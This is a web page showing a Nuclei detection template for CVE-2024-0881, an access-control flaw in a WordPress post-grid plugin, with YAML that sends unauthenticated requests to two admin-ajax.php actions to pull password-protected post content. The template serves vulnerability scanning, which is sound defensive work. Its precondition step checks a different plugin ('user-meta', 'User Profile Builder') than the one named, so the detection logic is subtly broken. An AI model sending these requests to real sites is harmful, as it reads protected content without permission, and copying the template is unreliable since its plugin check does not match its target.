Skip to content
Nuclei Templates

Combo Blocks < 2.2.76 - Improper Access Control

ID: CVE-2024-0881

Severity: medium

Author: s4e-io

Tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure

Description

Section titled “Description”

The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts

YAML Source

Section titled “YAML Source”
id: CVE-2024-0881


info:
  name: Combo Blocks < 2.2.76 - Improper Access Control
  author: s4e-io
  severity: medium
  description: |
    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
  reference:
    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
  classification:
    cve-id: CVE-2024-0881
    cwe-id: CWE-284
    epss-score: 0.00043
    epss-percentile: 0.08268
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/user-meta/"
  tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure


flow: http(1) && http(2)


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"


    matchers:
      - type: word
        internal: true
        words:
          - "User Profile Builder"


  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"html"'
          - '"<div class='
          - '"pagination":'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a0047304502201a25dcafd4d1875ccdbe6127e14054779bfffe3b78220c832f29346446bfab7d022100a5993a223b25f1319317ad1d795aff1c5419e105a91c565c1480fd7ebb41aabc:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-0881.yaml"

View on Github